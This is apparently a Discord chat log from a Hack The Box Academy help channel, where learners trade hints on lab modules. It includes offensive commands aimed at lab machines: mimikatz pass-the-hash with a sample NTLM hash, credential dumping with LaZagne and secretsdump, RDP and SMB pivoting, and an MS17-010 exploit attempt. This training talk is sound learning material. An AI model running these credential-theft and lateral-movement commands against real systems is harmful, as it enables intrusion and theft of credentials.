#modules

Did it finally 🥲 https://academy.hackthebox.com/achievement/864620/191

why you need to ue evil-winrm ?

coz i need to authenticate to it and have the flag at administrator desktop

that's the exercise question

you can do it without evil-winrm

xfreerdp /

???

you can try

that also donot work

please spoiler the message, the username is clearly visible in the image

just stop asking , and start thinking

don't overthink things

the username is mentioned in the section itself so i think it's allowed

you are my hard mentor

I can give you the answer easily but that's will not help you + I am too beginner to be some1 mentor

ok ok 😂

many people do enterprise network module blind, meaning just starting the machine and not reading the sections

one last advice , use bloodhound help and cheat sheet from the AD module

even if it's mentioned in the section it still spoils for people wanting to do it blind

I will do it blindly after few weeks

Ok let me delete it then

Then it will be fine I guess

Ok let me have a look with this

kali

Can anyone tell how cubes do we get at the starting?

can I dm you dear bro

can I dm you dear bro

can I dm you dearbro

Can anyone help me out with the passwords attack course, Credential Hunting in Linux tab. I'm stuck and I can't see what I'm doing wrong

where are you stuck?

Can I DM you??

ok

If you haven't figured it out, sure 😄

Found a other way around
Thanks

it was the || PSCredential || right

Nopes

😁

but how

I will better dm you

Otherwise again something will be a spoiler 🤣

you are tryhard

I mean , I am sure he is more happier now

okay dm me

can you be my mentor as well

lol

I am not a fucking mentor

I am so stupid to be one

dont go so low on urself

ur better than me

tryhard

• if you know a good mentor , please leeme know so I can learn

xct

eeem nice

maybe ippsec too

^-^

yeah man be my mentor too

@limber river you are so wanted

you suppose to be my mentor

what makes you think I know what i'm doing

Please teach me too sire

monkey typewriter, etc

consciousness

or you are unconscious

okay , I will make a course based on CEH , who want to buy it ?

I'd rather be unconscious

@limber river will be our new mentor...

to all of us

I would pay good money for that.

ask marcie for that

you will be scammed

humanity haven't had such brilliant mind since Pythagor

@limber river

he is the man for the job!!

bro you will take me to the jail know

nah fr is he actually 😂

nah who can i ask man

just direct meh

@limber river

check the #rules before asking such questions

dpgg is angry know

ah cool

whats wrong with his request?

it's against the rules

against what

#rules

4

he said his friend got locked out of his account

please keep the channel on topic

aight i guess no luck here

take care guys

🫡

well... i wish you to get lucky i guess

where will i start the basic from?

i m new here

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

thnx

On **Attacking Common Applicaitons > Skill assessment I ** > any hints to the format of name for application running?

Feel like I'vre tried every possible solution but it is not being accepted

one of the application mentioned in the module , one word , all lowercase

yeez

thanks wolfie

why tf the cheat sheet are on .pdf , miss the .md ones

did he just call you wolfie, i will call you wolfie too!!! and maybe doggo or dawg too

it's time to get back to my old useless name

nooo

dont you dare wolfie!!

I'm a bit confused... I get the same value, but the answer is not accepted 🤔 "Incorrect answer!"

I just finished this one. But have some questions on my thought process and like to check / validate it. Anyone up for a quick chat?

command injections skills assessment is wild i just started it and i see people writing they were stuck on it for days

Yo
Let's chit chat

Don't
That's a mind trap
What other took days you may find it within minutes

i mean i dont think its going to take me days but still seems hard

i managed to inject commands like pwd and id but cant figure out how to cat /flag.txt

if you can run things like pwd and id, why can't you run cat?

because i dont know how to execute / the PATH method doesnt work or any other method

Am I being dumb here? Path seems correct to the file

screenshot would help me understand your issue. sounds like you can actually run cat.

did you do that module?

where are you running the http server? is it on the desktop? or is it in your user's home directory

oh

if it's in the desktop directory: then you just need to specify the filename

thanks, I know what I did wrong

the way that the http.server (and any web service) module works is that it serves the current directory it's in/the webroot

Yep, as soon as you said it and I check where I run it from.. I was like .. Ahh..

LinEnum.sh.1 100%[===================>] 45.54K --.-KB/s in 0s

Much better

Noo my free instance died and I can't start another.. was so close to finishing

get a vm?

or pay for a silver annual

🤷‍♂️

I just paid

you don't even need annual to get pwnbox, just any plan I think

I have a VM just not on this laptop while i'm travelling

Just doing all the steps again

On the skills assessment for AD-SKills and Enum I cannot find the domain admin hash which is needed for accessing MS01. dumping LSA via mimikatz and using secretsdump only net me the local admin hash. Am i missing something important?

i am really struggling on the skill assessment of command injection i tried all the ways of obfuscating / and non of them worked :/

thats just tier 2 or 1, imagine how harder tier 3 or 4 will be

from what i see the course contain only level 1's and 2's

yeah the tier 3 modules are part of the senior web penetration testing path

and sadly not included in the student subscription

just don't be poor

or find some low tier bug on the platform and report it for gold annual

I've never thought about it that way, interesting strategy

question. in NMAP after I got back into doing the modules again, i noticed some forums people use -sSU instead of -sU when filtering an UDP port. Why? is it quieter?

I only ask because when i tried both, I got the same result.

-sSU doesn't do the full Syn - Syn/Ack - Ack response

-sS does a Syn - Syn/Ack - RST response chain

Gotchu

think of -sSU as -sS + -sU

(because it is)

and because UDP isn't a connection oriented protocol, not all UDP ports are expected to do a full handshake

I assumed it was -sS + -sU that at first but then I wanted to know a more detailed reason.

also, nice to see you again, you helped me a couple of times when I first did these labs

Hi guyz, I was asked to perfrom an nmap on the target and identify non-default ports that the telnet service is running on. But cant find the service, I search it up on google and it said default port for telnet is 23 which was also not showing in the nmap.

can someone help me out please?

i see it right there

hint: sometimes people use doubles instead of the non-standard

hi guys i have a question, in ffuf, exactly fuzzing recursive. what is the flag -e

Can anybody help me with a MSSQL syntax? Currently stuck on the last question. Question from academy is: list the non-default database present on the server.

read the man pages

thanks man

ohhhhh I read about this, in the pentesting process, admins use easy to remember alternative instead of the actual port, so it must be 2323 port with 3d-nfsd service

For the knowledge check on getting started, is this the area I should be focusing on to move to root?

perhaps

always try first before asking

I have been trying 😛

gtfobins is a useful site

Ah this was the site I was looking for

i believe i mentioned this to you previously, or maybe it was someone else that was on the same thing

Wasn't me

What does gtfobins stand for again? I remember Living off the land but can't recall gtfo, unless its as simple as I'm thinking it is lol

it's as simple as you think

Nice

gtfobins is linux, lolbins is windows

as generally priv-esc and stuff on windows using native binaries is called "Living off the land"

Right makes sense

Can anyone explain me why SELECT name FROM sys.databases; doesnt show me any databases in MSSQL? I cannot find any info on why it shouldn't. And everyone in the forum says it's the right syntax. Could it be the box?

inlanefreight.com doesnt exist on ffuf for subdomains

how can i fix it

Thank you!!

Got it finally

could be the box

sometimes it's a bit tricky, especially with windows related boxes

restart it and give it like 5-10 minutes before attempting to do any queries

Feels good to be getting such a better understanding

Okay, thanks a lot. I'll try it out!

Or try SELECT name FROM master.dbo.sysdatabases instead

cant visit it in firefox either

bruh

Already tried it with no luck..

Been rabbitholing quite a lot on this. But I hope it's just the box.

I still can't figure it out, I tried 3d-nfsd but its not correct. I thought it was the one because of the info in this image.

ah maybe a respawn then
Maybe the mssql service didnt fully setup or sumn

Yee, hope it's that! Thanks otherwise 🙂

because that's not the actual name

try interacting with it

uwcl also try sqsh

it looks like there just isn't any output at all

Well, now I cannot even connect to MSSQL

the query is correct

Yeah, it's weird asf.

could also be your impacket being dumb

I'll try to find an alternative. Pretty sad to be stuck at MSSQL :p

¯_(ツ)_/¯

there's a handful of things it could be

sometimes it's the tool, sometimes it's the lab

sometimes it's both

the answer is always netexec

ok the skill assessment was of command injection was a joke i hate over thinking

The moment you find the injection point, its over haha

Not gonna lie HTB academy is way better than porn. I simply love it ❤, the way of presentation actually need in Pentesting. Whoever made the whole module and the path gets my standing ovation. (Yeah obviously respect)

I agree it's so good

Mee too.

The compliment may sound sus Or weird but it's the damm truth. 🤳♥️

It's a good feeling when you complete certain parts

True + the fact is that the way of thinking and thought process is really unique

Absolutely genius folks at HTB

I just seen they are going to combine all HTB accounts as well, which is nice

1 login for all sites

@low girder you're twitter handle is not showing up on your profile, can you che k that out?

True

Oh I hadn't heard about this, where did they announce that?

"Soon you will be able to access all HTB platforms with a single HTB Account. Create and manage your HTB Account by visiting the HTB Account page." It's on the /profile/settings on HTB

That's awesome

I had this problem where mssclient.py doesnt work

Maybe try sqlsh or something like that i forgot the name

okay thanks! i'll try it out

Dont forget .\ since its windows auth

.\\

I can't get through the Oracle TNS module. I followed the instructions to install odat, but when I install it I get File "/home/kali/Documents/Python Scripts/odat/./odat.py", line 54, in <module>
from CVE_2012_3137 import CVE_2012_3137,runCVE20123137Module
File "/home/kali/Documents/Python Scripts/odat/CVE_2012_3137.py", line 9, in <module>
from Crypto.Cipher import AES
ModuleNotFoundError: No module named 'Crypto'

I can't find any documentation online that works to fix it

Nevermind. I just installed it via apt install and it works now. The module may be outdated.

what is the most challenging module you've done?

Password attacks so far lol , so time consuming

I agree with this. It's listed as 8 hours, but easily took 2 or 3 times that

Same it took me 4 days to complete it

Thank god. Finally done with MSSQL. Made it work by switching from my own VM to Pwnbox.

reinstall impacket probably

yeah thats the first thing i'll do now. That shit was exhausting

is it challenging or just time consuming

Just time consuming honestly, it’s wasn’t thaaat hard tbh

why do you need to crack it?

to get the password for the pertinent user so I can log into|| (172.16.6.3)|| and find that flag.txt

But sometimes a hash is as good as a password

why do you need to crack it ?

I could probably use a tool that takes the hash value I guess

Another question. In footpringin Easy, i got into the SSH for Ceil and found the flag.txt but when trying to read the contents it keeps saying "no such file/directory"

I think what they wanna tell you is that maybe there’s another method to log in instead of using pw

Especially when you can’t crack it

maybe use evil-wrm tool?

make sure the path in your command is correct

I cannot. So I will try a tool with the hash value

That was the case and found out what I was looking for

Hello again , I am having an issue with the Passwords Module , I am in a section where I use Lazagne.exe , I successfully transferred the lazagne.exe file , I ran it through the CMD , The exe runs fine , But then it auto close and I cannot seem to get the files..

I tried -oN and -oA , It doesnt give me the full passwords

Also AV is turned off..

anyone have any test sites to test my skills?

what skills

Anyone up for a DM on the SIEM Fundamentals skills assessment just so I can see if my logic is right?

Can't remember if you needed itunes back then and if the device had to be unlocked or not to sync

google would be your friend

i wanna contact someone about the hacking wordpress module , skill assessment. there is something really really weird and i just wanna know either if its intended or not

Send me a message. I'll be offline for about 2 hours, but then I'll take a look at it.

thanks

I am having issues in the intro to linux module for the Find Files and Directories section

I am trying to find the config file using the listed settings and I am just not getting anywhere

show me what you tried

how did you exactly try to find the directory ?

im pretty sure find --help will help

I am searching the /etc/ directory

okay but what did you try ?

find /etc/ -size -28k +25k *.config

The time part and size are what is causing me gref

try to modify this

you got through it?

having similar issues

Mod what parts?

man find will help

i can give you the exact comand but what good does that do ?

Can you at lease tell me if I am on the right track?

yes

you will find it with find

2 things: there's a command in the section that helps you, and 2 make sure you're connected to the target

Anyone know when the next module will be released? I think this has been the longest time between new modules.

inb4 in ~ 2 days Khaotic drops in and announces the next one

what section exactly?

there's a handful of sections in that module

yes

Credential Hunting

what did you try ?

cuz i passed it just alright

are you sure the file transferred properly

download it and then .\LaZagne.exe

Lazagne.exe

Copy n Paste through xfreerdp

Copy n Paste?

gonna need to be more descriptive than that

because copy/paste doesn't generally help with transferring files

it could be that the file got messed up when transferring

Right clicking and copying it >> On RDPed Machine Pasting

meh. try this :
1- host the file
2- in powershell : (New-Object System.Net.WebClient).DownloadFile("url", "location")

or just wget for that matter idk

Alright , Thanks

wget <url> -o <location>

with xfreerdp you can use the /drive: option to mount a drive

Because in the content , It was mentioned you can copy it over RDP

you can. its just not the best way

xfreerdp /v:ip /u:user /p:pass /drive:<name>,filepath

yes , simple as that

Many Thanks !

so if you say, have LaZagne in the tmp directory; you'd specify something like /drive:linux,/tmp/

Also just genral feedback on that question it is really advanced for a person geting in to linux

not really

no its not

this is really basic stuff

Find no but

Using 5 to ten switchs is

not really

lol

you dont need 10 args

the more switches the more specific

yes which is why i like to put a hundred switches lol

it's not advanced, it's just basic knowledge

yep

by 100 you're basically just forgetting where the file is

idc as long as im putting in more args

I am in a collage level course for a cert and even the person teaching it who has being teaching for years did not even know

-jibberish

that's because those certs are garbage

what cert? lmao

skill issue

LMAO

Comptia Linux+

garbage

yeah Linux+ is a bunch of theory

🧢

its so easy you cant miss it

CompTia exams are literally just theory courses

not even that

yes . multiple choice questions

But still are used to hire

Most apps get trashed if you do not have at lease a+

hell a good portion of the content is all about "who created Linux" and like barely even surface level stuff

dude . screw that cert . use find and find what you are looking for

like "when was linux created" yada yada yada

not much regrading actual linux usage

Yes, knowing the names of various socket types is useful. /s

The funny thing is that there are a lot of commands/options that you're rarely ever use

and when you do use them, you just check stackexchange/stackoverflow

dude, just, find / -type f -name *.conf -size size -newermt date

does not get easier than that tbh

2> /dev/null

yes dev null

of course. thanks

one thing i need to do is awk

A lot of these commands would be more useful if you're only limited to the use of a terminal.

the question asks for a specific file size range

It would make sense to know them if you worked in Antarctica, I guess

then hell -size +10k -size -15k lol

-size isn't great either.

i mean there is a LOT of filtering you can do lol

is there a better option to use for a size range?

idk why one would get stuck

genuine q

-70M? 69.01 MB will be too large.

yes genuine q

the most people get stuck is because they aren't connected to the target

https://superuser.com/a/1343881

yes i'm aware of that flaw

it rounds up any decimal

Maybe it's just me, but I find that too many of these courses focus on how to use random binaries in a terminal instead of learning how to use linux as a server.

but i will agree that the linux fundamentals course is very jank

what does jank mean

mile wide, inch deep

like some of the stuff is just out of order/just weird in general

ah

can you stop talking about me

I think it's very funny when you think about what htb actually uses in the public boxes - almost everything can be found with linpeas

probably lol i haven't touched many boxes

And once you've seen it enough times, you won't even have to run linpeas because you know there are only a few places where things are placed.

¯_(ツ)_/¯

marcie is a noob (better than me)

I think it's a pretty big problem when it comes to teaching people how to use linux/windows

Windows: "Here's how to become a 'productive' user of our OS"

Linux: "Here's how to use the terminal"

windows doesn't focus on CLI which can be daunting for the avg GUI user

windows just sucks

aight people im EXHAUSTED . goodnight

I think there's too much of a focus on how they're different, when fundamentally most things in tech work the same way.

Scheduled tasks? Cron jobs.

oh yeah it's not too much different; just different names for the same functions

sudo? runas

Problem for the most people is they never learn how to USE a computer. why? they think they dont need to. And to be frank there isnt that much education about that in schools.

I hate how a lot of online tech now is people pretending to know what they're doing because they can build a glorified lego set.

chatGPT told me to do it

People whose entire identity is "gamer" spout off the most useless tech advice.

It's not limited to desktops of course. The same issue occurs with phones, where they lol only review the camera

tbf with Apple, that's literally the ONLY thing that's changed

If you know how the computer actually works and how to use it GUI or no GUI is not a problem at all

It becomes really funny when you have videos where they review motherboards and their vrms, but have absolutely no idea what VMs are

"I am great at benchmarking"

The Linux Fundamentals should be named Linux CLI fundamentals IMO. I didn't find that module hard but Im comfortable with MacOS, Windows and Linux so I might be bias..... I just think a name change could be benifical.

I agree; it doesn't teach much outside the CLI

Is it even useful for HTB though?

The only thing you need to know for htb is how to run a script, how to find a file, and how to cat a file.

the point is to be useful outside of HTB

that's just it. It's hardly useful outside of htb

It's a bunch of disconnected ideas with no overarching goals to teach a user what to do.

I mean maybe there is some common GUI knowledge that is assumed to be known. HTB is all mostly about CTF's, I think that in the real world/jobs (Not that HTB isnt a job) but there preparing you to find more than just "HTB{yadayda}".

it's moreso a collection of knowledge that can't really be tied to one specific goal

that's not even true lol, have you done any linux boxes are the medium and above?

or even the bizness box, that's easy

lol yeah. I forgot to add more to that.

Some of the ideas can seem disconnected but I think if you do the whole path of something (Academy side) it connects very well.

There's a lot of stuff that isn't taught, like how to use docker, or how to use a credential manager.

fair

because docker isn't really a base level thing to know

or a credential manager lol

also most credential managers have their own documentation

HTB also sets you up to go out and learn other things than just course material tho...

I don't remember if it really teaches you the FHS, and how it works until it doesn't lol.

(it would also look bad on HTB if they use/showcase a credential manager that then later has a leak -- it looks bad)

Where are the log files for neo4j? Turns out it's in /etc, lol.

I also am assuming a reason not to is because most half-decent cred managers are paid

hello gyus

How long will this last, who knows

Hello

I guess my issue with most of these types of tutorials is that they focus too much on how to use a command, instead of teaching people how a system works and how to get a job done.

bump on this, would love to discuss the questions with someone who completed it

Hey guys is there a faster way to brute force ssh with the mutaded list on the Password Attack Module, i tried to up the threads number but ssh doesn't like it

bruteforce a different service

oh yeah there's smb running

done 🙂

mb, thanks!

Damn you've been consistently one module ahead of me, I was hoping to catch up to you as a personal goal of mine 🤣

i got some spare time today from my company and used it 😉

i do the next module tomorrow then 😉

Alright so I got the rest of the day to catch up got it

https://tenor.com/view/hostes-kaptan-gif-12652528

Damn now I just want to watch that movie for the 100th time

i was stuck for about 3 days on XXS

Yeah I'm trying to get through that today, probably my least favorite module so far

you will 🙂

xxs is one of the best

its not my fv tbh

Maybe it's just not my particular area of interest but I really do miss the AD module now compared to XSS

from the topic, but the module itself is very good

Yeah I should've clarified that, the module content itself isn't bad or anything

btw one in this room has passed flag 12 today 😉

not me

stilll looking?

Stuck on file upload skill assessment. Can't figure out how to read the .PHP files to find upload path.
Was able to bypass, and upload svg files, but svg content just gets returned in base64 and doesn't read the PHP files
Any help would be sweet

i will do it probably tomorrow please cover spoilers 🙂

im stuck at skills assessement of pivoting module in : For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.

i already found vfrank hash that i couldn't crack

but idk how to proceed

I don't recall if his password was uncrackable

did you " enumerate the networks" ?

tried the netsh on rdp on first host pivoted

i only found one aactive host from there

did you chisel ?

no i didnt

i used dynamic port forwarding with ssh

then rdped into ||172.16.5.35||

||got the lsass.exe||

how do you mark the spoil in the chat

how many nics are on 172. ?

im spoiling rn

||

||jj

wrap it in the ||

||ll||

ya goon

2

||there is a powershell script for enum ||

i used the ||cmd one ||

should do the same

and still got one host i will try with powershell

which is ||.6.35||

lemme try again

Does anyone know how to deal with the following when I connect to an FTP server and try to run commands "229 Entering Extended Passive Mode (|||17211|)
150 Opening ASCII mode data connection for file list
226 Transfer complete
"

pasv

invalid command

or "help" 😉

I ran help, but all of the commands listed on the help page give me the same response

maybe passive ,, try to use help

That's why, I love ligolo

lmao literally everyone saying ligolo is the goat

imma try it after i finish the module with rhe sections methods

It is

Glhf

'passive'

Well, that did something, but now I get "EPRT command successful" instead of the Passive Mode one lol

i found new hosts alive

great 🙂 , HF

Can someone dm for help on file upload skills assessment. Stuck trying find path.

ty

i was putting the wrong ip

idk why the cmd didnt show me the other hosts available

probably one for the double pivot and another for DC

ioxid on ncx to test if possible

pro tipp 😉

what

didnt understand lmao

nxc smb $IP -L

better then crackmapexec imho : https://www.netexec.wiki/

I gotta start using netexec, I'm just in such a habit of always running CME it's hard to break

its the same syntax as CME I'm assuming

its quite the same tool but a bit better

It's literally the same tool

That was my understanding of it from looking at the github page but I wasn't sure since I've never used it yet

It's a fork of CME that was created due to the owner of CME wanting to run it in a different way than the contributors desired

So they forked off and made it their own tool

<@&861185840277487616>

https://tenor.com/view/drake-hotline-bling-dance-dancing-gif-17654506

You are placing serious trust in strangers, not to mention, we don't know if that number is actually yours. And you're trying to have some randos spam call/harass someone

mostly just getting errors on opening community files

maybe he is from norton or paypal 😄

this was the wrong chat.

Once you get the username/password- use other services

This is the right chat for module assistance @misty cedar

I meant on continuing my sentence. XD but this is the right one indeed

Step 0, enumerate

duh im stuck on getting to the DC

any hints?

on skills assessement on pivoting module

Your final user should have access to the dc iirc at least a fileshare accessible

i dont have access to the DC fileshare network

the Z drive

how long are you working on this ?

Weird, I could have sworn I didn't need to hop to the dc I was able to access the Z:\ drive just fine

lmaoooo

about 3-4h

try nxc smb -u $user -p $pass --shares

i don't have a pw only hashes

if hash is valid use -H

I thought it was because the owner didn't want to work on it anymore.

Nope; that's why it got archived

wait nothing happened

its says port 445 not opened

This project was initially created in 2015 by @byt3bl33d3r, known as CrackMapExec. In 2019 @mpgn_x64 started maintaining the project for the next 4 years, adding a lot of great tools and features. In September 2023 he retired from maintaining the project.

i mean the error is socket error or timeout!

There's literally a whole conversation thread that goes into it more

link?

It's on the github page

https://github.com/byt3bl33d3r/CrackMapExec/discussions/801

belongs into every pentester toolset

lol drama

im done cant access this shit

then find another way 🙂

my head wont spit more ideas to try rn

im still trying lol

i need a hint

only 2 questions to go ?

only 1

i just need to get to the DC

"just" 😄

hahahaha

wait lemme try my last idea

nvm

did not work ?

didnt

dm me

good afternoon, I am stuck once again. I am trying to find the solution to what the full system path is for this modulehttps://academy.hackthebox.com/module/112/section/1067. I have tried to pwd and come up with the path but it keeps saying no

I am very stuck here

i need help with this How many total packages are installed on the target system?
Ive tried all commans I know and the ones of the module but i cant find the answer

have a little chat with chatGPT

already tried

and nothing

that's how I feel with where I am stuck

That file path doesn't look like windows

//<ip>/<share>/<dir> that is the generic version of what I have found

Rpc

not sure what Rpc means

Read the section

My autocorrect just auto capitalized the R

But it's definitely in the section

remote procedure call = rpc

looking now, thanks

the path it's showing is a windows drive, but this is al linux system?

Use a tiny bit of critical thinking to get the answer then

I appreciate your helping but that doesn't help me. Critical thinking and trying new approaches is what I have been doing. It would be helpful to know a direction to think in not to just think critically

I have no idea where to take the knowledge. I have the windows path for the share, but that isn't the format the answer needs. I try to put it as a linux path but it doesn't take it

telling me to look at rpc was very helpful, that kind of advice is what I am talking about

are you able to give me a bit more specific of a pointer?

Well you have the right idea with linux, so don't overthink it

I guess I am overthinking it because I am completely lost lol

here is what I am thinking, maybe you can tell me if I am in the right direction the generic version of the what i found was c:<dir><share>\ and that needs to be translated into a linux format of <ip>/<dir>/<share>

I'm completely at a loss. I'm doing the Footprinting Lab - Medium. I got into the SMB server, grabbed the admin password, and got to the login screen here. I've tried every combination of username and password I can figure out, but nothing seems to work.

why is the ubuntu server giving the path in windows format in the first place

Smb

Smb is a windows protocol

because of the translation bit the docs was talking about?

I figured it out. I was supposed to open the server management studio as admin and the password worked there.

Did you try running as admin

server message block

That was the solution lol

https://tenor.com/view/itcrowd-reboot-gif-4770974

here is what I am thinking, maybe you can tell me if I am in the right direction the generic version of the what i found was c:<dir><share>\ and that needs to be translated into a linux format of <ip>/<dir>/<share>

Reverse

It's because linux has a different filesystem format

But it needs to be translated for windows

is the ip address part of what HTB is expecting? it must be because how else does it know where the server is

The host OS running the smb client was linux

It depends

You need the network path to be able to interact with shares

The network path can be the ip, or it can be the hostname of the device sharing it

ok, let me mess around again and see if i can make progress

But the question is specifically asking the full system path of the share

Which if it's not the windows path, it's linux

Yeah, i understand that it wants the full linux path, im just not seeing how to get there, I think I now understand what you meant about reversing the order

but I am just not finding the solution here

there is nothing in the module ?

that kind of advice isn't really helpful

Its literally the windows path without c:

but it's not, it wants it in linux format and when i inpute /<dir>/<user>/it doesn't take it

which tool are you using ?

rpccliet

for smb ?

sorry rpcclient

that's what the module used to output the smb path

I can assure you that's how it's formatted

windos is normally \\,,,\

then i don't understand why it's not taking it

It's an smbclient running on a linux machine

It's asking for the file path on the host machine

Not the share path

Hint

Remember that Linux-based operating systems do not have a "C:" drive.

sorry did that module some time ago

It's literally taking the C:\ answer it gives you, just needs to be flipped for linux and drop the C:

all good, I am new at this and just lost right now

||/h*/s*||

wait i staret the instance

Yes

So just flip it

Don't include the last /

Spoilers btw

I know,sorry was trying very hard to not go herte

I recommend deleting

wich questionnumber is it ?

Last question in the section

Also: the question gives you the format it wants

yea, i have seen that

So why are you including the trailing /

ok understood

finally

where are user profiles saved on windows ?

sorry

He has the answer, just didn't format it the way the question wanted

sorry, this is difficult for me

I mean it's as simple as flipping the \ around

yes

From \ to / and formatting to how the question wants

Question says it doesn't want the last /

So you don't include it

WINDOWS EVENT LOGS & FINDING EVIL mini-module: the RDP session is very unstable and keeps disconnecting. any ideas or workarounds?

Use tcp vpn, change vpn region, wait 5-10 minutes after spawning lab

good night and have fun 🙂

sounds good thx !

I f'ed up. I'm on passwords. I beat mutations, then headed home from work. In the meantime, the VM reset. I don't have the creds anymore for the next task. Can someone DM me the creds? I don't want to spend another eternity cracking that password again. Can provide proof of completion of last task (if allowed. if not, ignore this)

@x90 i thought ur name was green

This is a lesson to always save creds

This XSS module is testing my patience damn targets don't want to spawn

targets on my lab arent spawning either

lol it's like the website heard me complaining, finally spawned

same

try yelling at the website it worked for me

it's amusing that the module infrastructure which cost more than htb gaming platform is not as reliable

if it weren't for such shitty and unreliable module machines i wouldn't be in this discord at all. look what the cat dragged in

Hello, I have a problem with module Password Attack Pass the Hash section. I got the flag for question 1, 2 and 3 but for question 4. Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. The modules said that we can use RDP to connect to the administrator account after we impacket-psexec in to enable RestricedAdminMode yet I can't do that. I can only use RDP to connect to david account using his hash, . Since mimikatz command will spawn another cmd in david account, I need to do that using RDP, but when I use RDP with david account and mimikatz it shows this error

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

Also when I try to RDP to administrator account this is the error I got

Is this normal, if it's normal, what step did I do wrong?

the error is access denied, are you running mimikatz as admin?

also, you don't need rdp to run mimi, you can use it in non interactive mode like this

.\mimikatz.exe "privilege::debug" "token::elevate" "<command here>" "exit"

Understood, I will try that first, thanks for the reply.

In my understanding, I need to just do PtH attack by first PtH to administrator account, then use mimikatz to PtH to David's account, then I should be able to have the permission to view the flag from \\dc01\david right? but after I execute this mimikatz command ||.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:dc01 /run:cmd.exe"|| I still am the same administrator account, can you please clarify what did I do wrong? Thanks

why not pth to dc01 using evil-winrm directly? if you want to double pth with mimikatz, since it's running in non interactive mode, you'd need to get the flag in the command itself, mimikatz exits and it won't change the current user context

oh the question is telling you to rdp, so: enable rdp as admin, rdp in and use mimikatz to pth

Currently working my way through 'The Live Engagements' of the Shells & Payloads module, and I've stuck on Host-3. I know It's exploitable by MS17_010. The hint in the Lab basically give it away, and the MSF auxiliary module confirms it, but running ms17_010_psexec keeps returning "exploit completed but no session was created".

Could anyone who has completed this possibly point me in the right direction?

make sure you LHOST and LPORT is correct

The LHOST is set to foothold machine I have to RDP into, and I've tried changing the port half a dozen times

along with default 4444

do i need to open a seperate netcat listener and point it to there?

that lhost would be incorrect, run ifconfig to see what IP you should set it to, and read the "Target Hosts" part again

thank you!

It's easier to use tun0 btw

in this case you're given an attack host to rdp into, so it wouldn't be tun0

Any tips on Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) with the ADCS module? I've tried everything. ntpdate, manually changing the date on my machine, nothing works. I went back and looked at other people mentioning this problem and wasn't able to find a solution either.

I'm working on Attacking Enterprise Networks and am stuck on sending the HTTP TRACK request through my browser.
I tried porting the request from burp into the default burp proxy browser but it also does not handle TRACK method requests.

Anyone that completed this module able to help me out?

ntpdate against the DC

I've tried using TRACE instead because I see it as an option in Firefox/Chrome but Trace is not the same as Track

in addition to above, check your VM settings that youre not accidentally auto updating the time of your VM.

ntpdate says it changes the clock, but it doesn't. i also manually changed it but it still says it's off.

not a vm.

VM or not sounds like your time is auto updating and you need to turn that off

it's not, it's on manual time. can't even enable it because kali is 'quiet' by default and doesn't call out to ntp servers

and if it is, i don't know why or how

I mean those are your two scenarios. Either your time is auto updating, or youve simply set it wrong

There really isnt a third option here

right, which is why i came here for help because it's not working

i'm just going to skip that method for now and hope it's not required to complete the module

it comes up a couple times

i'll try from the attack box if it comes up

yooo no spoils

just use request in browser , it should work

It just leads to a blank page and when inspecting in burps chromium browser it looks like a post request and I am unable to change it manually

Neither do we with this information

what does this mean on weekly streak??

1 day left?

you have a one week streak and yet to complete this week's

word

Is there any chat where i can ask general cybersecurity questions

What does the week streak?

hi for this part, i assume $0 i assigned to script.sh?

I have 4 week streak but seems that i didnt win anything

just for a badge i think

hello guys.. a question gobuster dns enumeration is the same with subbrute ?

hello! I meet a problem: I'm working on ACTIVE DIRECTORY ENUMERATION & ATTACKS---Kerberoasting - from Windows, when I run kirbi2john.py and got a blank blank crack_file. Can someone help plz? Thanks in advacd.

Hello L0ccc! Sorry for disturbing. I have the same question: where is the kirbi file? Did you find it? Thank you.

when exit the mimikatz, the file kirbi is located in the current directory bro.

https://academy.hackthebox.com/achievement/386037/158

the skills assessement took everything from me

Thanks for reply, but I'm sitll confuse. Do you mean the file kirbi is on location Desktop? I do find a txt file in the directory of mimikatz, but I find no kirbi files.

with a cool mind follow the steps,
it will led to the answer

hi 🙂

https://tenor.com/view/hh-whta-uout-gif-22206643

anyone able to help me out on "Attacking Thick Client Applications" ? Struggling to find the correct RW MAP

What am I doing wrong? I can't answer the questions because I can't seem to query to get the MX server.

Any is deprecated

Oh, so this module is outdated then

However dig has the MX query

It's not really outdated; it's moreso read how the tool works

Also since PayPal is a public site, you don't need to specify an ip/nameserver

As its accessible via public domain servers

Okay, yeah, I got the answer using dig -t MX.

Was there something wrong with my nslookup query or does it just not work like that anymore since it's deprecated?

You should be able to run a non-specific query on it with nslookup

The only thing deprecated is the "any" query

What does this mean? I spawned the system but these addresses don't seem to exist.

thsts the answer to your question 🙂

Is it saying I need to enumerate the system to find information on those vhosts?

Or is it saying I need to modify my /etc/hosts to link the spawned system IP to the two vhosts?

maybe you need a nameserver and "dig" it ?

or fuzz it

Add them to your hosts file

I could fuzz it, but fuzzing isn't taught in this module

This did the trick. I've done that on boxes but never seen it referred to as a vHost before.

That's what they're called

Good info for future modules

Virtual Hosts

vHosts

hello, I am quite lost on the "Suricata Rule Development Part 2 (Encrypted Traffic)" Module, the question:

There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer.

so I did just like the example, first calculate the ja3 hash of the trickbot.pcap
than I run suricata but the fast.log is returning empty.

I also get an error when running suricata after uncommenting the rule with the sid 100299

I got the problem, the content field should not be empty, we need to look for something in the json generated to add there. in case someone have similar issue in the future.

Working on the medium footprinting lab https://academy.hackthebox.com/module/112/section/1079; can't access the nfs share after it's mounted. ran
sudo mkdir target-NFS | sudo mount -t nfs <targetip>:/ ./target-NFS/ -o nolock
and it mounts the drive as this:
drwx------ 2 nobody nogroup 65536 Nov 10 2021 target-NFS
Can't cd to TechSupport from within target-NFS, get permission denied.
Tried chmod and chown to change permissions, didn't work.
When I unmount the share, the folder goes back to root ownership:
drwxr-xr-x 2 root root 4096 Mar 1 08:46 target-NFS
Also tried this:
sudo mount -t nfs <targetip>:/TechSupport ./target-NFS -o rw,nolock
and that didn't work either.
